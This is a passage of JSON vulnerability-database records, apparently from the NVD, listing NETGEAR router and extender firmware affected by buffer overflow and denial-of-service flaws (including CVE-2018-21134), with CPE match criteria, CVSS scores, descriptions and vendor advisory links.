"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-22T16:15:11.543",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051480/Security-Advisory-for-Denial-of-Service-on-Some-Routers-PSV-2017-0648"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051480/Security-Advisory-for-Denial-of-Service-on-Some-Routers-PSV-2017-0648"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-23 20:15
Modified
2024-11-21 04:02
Severity ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects R6700 before 1.0.1.48, R7900 before 1.0.2.16, R6900 before 1.0.1.48, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R6250 before 1.0.4.30, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.60, R7000 before 1.0.9.34, R7100LG before 1.0.0.48, R7300 before 1.0.0.68, R8000 before 1.0.4.18, R8000P before 1.4.1.24, R7900P before 1.4.1.24, R8500 before 1.0.2.122, R8300 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, EX3700 before 1.0.0.72, EX3800 before 1.0.0.72, EX6000 before 1.0.0.32, EX6100 before 1.0.2.24, EX6120 before 1.0.0.42, EX6130 before 1.0.0.24, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, D7000v2 before 1.0.0.51, D6220 before 1.0.0.46, D6400 before 1.0.0.82, and D8500 before 1.0.3.42.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "732F20CF-135F-4CBF-988F-215B534994B1",
"versionEndExcluding": "1.0.1.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "471E4F42-7114-4A7F-832D-2E9222BD25B4",
"versionEndExcluding": "1.0.2.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BAAD2F7-BF0A-412B-BC2E-A69DC9BCB52E",
"versionEndExcluding": "1.0.1.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "90805FFE-E59D-43D2-BF1E-D55458CF05BF",
"versionEndExcluding": "1.3.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52A6DEB2-3A33-4184-866D-9C8D9DD991C6",
"versionEndExcluding": "1.3.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5DE93565-D893-4AB3-83A9-BCEFAF6547E0",
"versionEndExcluding": "1.0.4.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E997B769-B2F7-4BB5-A834-96A68EF842BA",
"versionEndExcluding": "1.0.4.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AF638167-B018-4140-B115-C65F387EFD77",
"versionEndExcluding": "1.0.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "903EC8C1-0504-45B8-846C-8E1855A250E3",
"versionEndExcluding": "1.0.2.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E453D3AE-A218-4791-BB19-79C2CF6EC6F8",
"versionEndExcluding": "1.0.9.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4B484FA9-17B9-4829-9152-83691EE6A9BB",
"versionEndExcluding": "1.0.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "586740D8-2423-404C-B5E2-23B273945CCD",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "29B13F94-F151-4F00-95C3-D9FB22B3CC2B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6C5FC237-F74C-4771-B5D3-36CF245C0396",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A1DEFB47-32C4-4AF6-87AF-0C09E8D5CD81",
"versionEndExcluding": "1.4.1.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4FED192A-8427-4293-850F-42519DBE7521",
"versionEndExcluding": "1.4.1.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4CA2B4B5-ED8D-476F-9F6E-630B43A38E27",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB84CB9C-DA5C-4D18-9A54-375DD091D932",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0675F6C4-EB61-4DA3-8473-448E93D5E0A5",
"versionEndExcluding": "1.0.1.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "067A3FE0-6499-4C89-B793-579DB08265B8",
"versionEndExcluding": "1.0.0.72",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D715AF1-87CE-4604-BD91-18C06D553C4F",
"versionEndExcluding": "1.0.0.72",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0F27D2E5-0855-4FFC-BC4E-A437C4F80AB8",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "094113E0-3656-4E2A-B9EF-D397296BD07C",
"versionEndExcluding": "1.0.2.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "23EA7CC1-B1E8-431F-B4AF-8393B85F26E3",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3611A1C1-CEA4-4D32-B692-AE2036F704D3",
"versionEndExcluding": "1.0.0.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D74896A7-7EF2-41C9-8A29-59B2EA5ABA5C",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CB9BD19-E748-41B9-8873-316FEB83F13D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A81A7574-A2C7-4216-98C6-6790FA705013",
"versionEndExcluding": "1.0.3.88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2F1E93FB-4926-4AF5-BA5F-A4DE4314B45F",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52FB0300-0FC9-4797-BACB-84D7D932A386",
"versionEndExcluding": "1.0.0.51",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E6ABD67D-F08A-4879-A497-EA3DF0A87D4B",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E84B61C3-54CA-4127-AE6B-E63AB51E0C85",
"versionEndExcluding": "1.0.0.82",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "629E89E8-F329-4D11-9652-540752084DD3",
"versionEndExcluding": "1.0.3.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects R6700 before 1.0.1.48, R7900 before 1.0.2.16, R6900 before 1.0.1.48, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R6250 before 1.0.4.30, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.60, R7000 before 1.0.9.34, R7100LG before 1.0.0.48, R7300 before 1.0.0.68, R8000 before 1.0.4.18, R8000P before 1.4.1.24, R7900P before 1.4.1.24, R8500 before 1.0.2.122, R8300 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, EX3700 before 1.0.0.72, EX3800 before 1.0.0.72, EX6000 before 1.0.0.32, EX6100 before 1.0.2.24, EX6120 before 1.0.0.42, EX6130 before 1.0.0.24, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, D7000v2 before 1.0.0.51, D6220 before 1.0.0.46, D6400 before 1.0.0.82, and D8500 before 1.0.3.42."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer en la regi\u00f3n stack de la memoria por parte de un atacante no autenticado. Esto afecta a R6700 versiones anteriores a 1.0.1.48, R7900 versiones anteriores a 1.0.2.16, R6900 versiones anteriores a 1.0.1.48, R7000P versiones anteriores a 1.3.1.44, R6900P versiones anteriores a 1.3.1.44, R6250 versiones anteriores a 1.0.4.30, R6300v2 versiones anteriores a 1.0.4.32, R6400 versiones anteriores a 1.0.1.44, R6400v2 versiones anteriores a 1.0.2.60, R7000 versiones anteriores a 1.0.9.34, R7100LG versiones anteriores a 1.0.0.48, R7300 versiones anteriores a 1.0.0.68, R8000 versiones anteriores a 1.0.4.18, R8000P versiones anteriores a 1.4.1.24, R7900P versiones anteriores a 1.4.1.24, R8500 versiones anteriores a 1.0.2.122, R8300 versiones anteriores a 1.0.2.122, WN2500RPv2 versiones anteriores a 1.0.1.54, EX3700 versiones anteriores a 1.0.0.72, EX3800 versiones anteriores a 1.0.0.72, EX6000 versiones anteriores a 1.0.0.32, EX6100 versiones anteriores a 1.0.2.24, EX6120 versiones anteriores a 1.0.0.42, EX6130 versiones anteriores a 1.0.0.24, EX6150v1 versiones anteriores a 1.0. 0.42, EX6200 versiones anteriores a 1.0.3.88, EX7000 versiones anteriores a 1.0.0.66, D7000v2 versiones anteriores a 1.0.0.51, D6220 versiones anteriores a 1.0.0.46, D6400 versiones anteriores a 1.0.0.82 y D8500 versiones anteriores a 1.0.3.42."
}
],
"id": "CVE-2018-21134",
"lastModified": "2024-11-21T04:02:58.950",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
"version": "3.0"
},
"exploitabilityScore": 2.1,
"impactScore": 4.7,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-23T20:15:12.943",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060226/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Wireless-Extenders-PSV-2017-2019"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060226/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Wireless-Extenders-PSV-2017-2019"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 20:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.40, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6300v2 before 1.0.4.18, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6700v3 before 1.0.2.32, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R6900P before 1.0.0.56, R7000P before 1.0.0.56, R7100LG before 1.0.0.42, R7300DST before 1.0.0.54, R7900 before 1.0.1.26, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, and WNR3500Lv2 before 1.2.0.46. NOTE: this may be a result of an incomplete fix for CVE-2017-18864.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B8AA0851-BFD5-45F6-9673-CA4B83D8B844",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5E70AF3-FFD8-4ACD-9F4C-DB03BFB1125A",
"versionEndExcluding": "1.0.3.39",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54C9BF9A-F891-4337-AAFF-6E192A81B45B",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "74109B25-B64E-4166-A7B0-E3DA87B89161",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7147AB6A-80B2-4468-BF13-5B7554AA5DA3",
"versionEndExcluding": "1.0.0.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
